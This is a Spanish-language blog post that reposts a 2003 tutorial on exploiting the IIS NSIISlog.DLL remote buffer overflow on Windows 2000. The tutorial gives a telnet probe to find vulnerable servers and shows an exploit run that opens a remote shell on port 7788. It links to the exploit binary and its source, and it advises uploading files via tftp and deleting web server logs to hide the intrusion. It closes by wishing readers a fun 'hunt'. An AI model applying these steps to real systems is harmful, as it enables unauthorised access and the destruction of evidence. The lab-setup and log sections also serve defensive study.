• Administro la red informática de una empresa con Windows
  • Soy wembaster de más de 20 páginas web
  • Hago una tesis doctoral en ingeniería con Linux
  • Estudié Física e Ingeniería
  • Me gusta la seguridad informática y hacer de hacker

iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)

iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)

PROBLEMA

Escaneando con X-scan mi sistema descubrí que tiene esta vulnerabilidad en el iis y NSIISlog.DLL.

CAUSA
Nadie es perfecto, salvo Dios

SOLUCIÓN
Buscar cómo explotarla, para ver si es sencillo

DESARROLLO
No fue fácil encontrar una explicación buena de cómo explotar el bug de buffer overflow remoto (NSIISlog.DLL). Había alguna información sobre iis exploits, pero ninguna me convenció, hasta que encontré un artíuculo que copio a continuación.

Me di cuenta de que, si mi sistema sólo tiene este resquicio, no le merece la pena entrar a un hacker, porque hay sistemas más vulnerables que el mío.

Os copio el artículo:

Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
Enviado el Sábado, 19 julio a las 01:19:55 por SeSoX

1.- Sistemas vulnerables
2.- Como saber si un sistema es vulnerable
3.- Creando un sistema vulnerable
4.- Consiguiendo acceso por telnet
5.- Echando un vistazo a los logs
6.- Agradecimientos y Despedida


1.- Sistemas vulnerables
^^^^^^^^^^^^^^^^^^^^

Tal y como podemos ver en la web de securityfocus[1], los sitemas vulnerables son:

Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server


2.- Como saber si un sistema es vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Para saber si un sistema es vulnerable lo que debemos hacer es un telnet a su puerto 80 y hacer una peticion al servidor, aqui os muestro la respuesta del servidor en caso de ser y no ser vulnerable:

NOTA: Se han eliminado los tags html para facilitar la publicacion del documento.

Siendo vulnerable responderia:

SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:23:46 GMT
Content-Type: text/html

NetShow ISAPI Log Dll
NetShow ISAPI Log Dll
Connection closed by foreign host.



NO siendo vulnerable responderia:

SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0

HTTP/1.1 500 Error del servidor
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:29:02 GMT
Content-Type: text/html
Content-Length: 105

Error
No se puede encontrar el módulo especificado.
Connection closed by foreign host.

En caso de no ser vulnerable tambien nos podria responder con otras cosas como por ejemplo:

Error
%1 no es una aplicación Win32 válida.
Connection closed by foreign host.

Pero esto ya os lo dejo a cada uno.



3.- Creando un sistema vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lo que tenemos que hacer para que un sistema w2k sea vulnerable es instalar el propio windows,
el IIS y tambien el windows media services. Si vamos a hacer una instalacion nueva de w2k debemos
tener en cuenta que el windows media services no lo podemos seleccionar para que se instale en
la propia instalacion de windows (en este caso el bug no funciona) debemos instalarlo despues
desde la opcion de agregar o quitar programas. De este modo, hacemos la instalacion de windows
con el IIS y una vez echo esto, instalamos windows media services desde agregar o quitar programas,
si nos fijamos esto nos creara un fichero (NSIISLOG.DLL) dentro de la carpeta scripts del
directorio del servidor web (IIS) y una vez comprobado esto, podemos usar el paso 2 para comprobar
que realmente somos vulnerables. En caso de que no os funcione, podeis probar a reiniciar el
servidor web desde panel de control -> servicios -> Servicio de publicacion en Wordl Wide Web.


4.- Consiguiendo acceso por telnet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bueno, una vez localizado un servidor vulnerable usando la tecnica explicada en el punto 2 debemos
usar el exploit[2] para poder conseguir una cuenta en el sistema, lo que debemos hacer es lo
siguiente:


C:>nsiislog 192.168.0.25

C:>telnet 192.168.0.25 7788

Microsoft Windows 2000 [Versi¢n 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:WINNTsystem32>

Ya tenemos acceso al sistema!!!!!!!!!!!! ahora deja volar tu imaginacion };)
Podemos usar tftp para subir ficheros al servidor y si somos un poco paranoicos
pasarnos por el directorio c:winntsystem32logfilesw3svc1 para borrar los logs.


5.- Echando un vistazo a los logs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Revisando un poco los logs que deja este ataque, podemos ver algo como lo siguiente:

Fichero: C:WINNTsystem32LogFilesW3SVC1ex030718.log

2003-07-18 12:45:02 192.168.0.25 - 192.168.0.25 80 POST /scripts/nsiislog.dll - 500 -

En el caso del test para saber si el sistema es o no vulnerable el log seria:

2003-07-18 12:32:24 192.168.0.25 - 192.168.0.25 80 GET /scripts/nsiislog.dll - 500 -


5.- Agradecimientos y Despedida
^^^^^^^^^^^^^^^^^^^^^^^^^^^

Agradecer a ASzY la revicion de este documento, a toda la peña que me ha ayudado cuando lo
he necesitado y a toda la gente que escribe textos como este para enseñar cosillas a los demas.

Si os surge cualquier duda, encontrais algun fallo o quereis añadir algo en este texto, no dudeis
en escribirme a (sesox at govannom dot org) porque estare encantado de leer vuestros correos.

Que tengais una divertida y productiva caza!!!! ;)

[1] http://www.securityfocus.com/bid/8035
[2] http://www.govannom.org/seguridad/exploits/robesan/nsiislog.exe
http://www.govannom.org/seguridad/exploits/robesan/xfocus-nsiislog.c

Mas informacion:

http://www.terra.es/personal6/robesan/IIS_Media.pdf
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2003-07/0014.html
http://rynhozeros.com.ar/article478.html
http://www.vsantivirus.com/vulms03-022.htm
http://www.vsantivirus.com/vulms03-019.htm

Tambien podeis consultar este texto en la seccion de seguridad de www.govannom.org.

Comments on "iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)"

 

post a comment

Links to "iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)"

Create a Link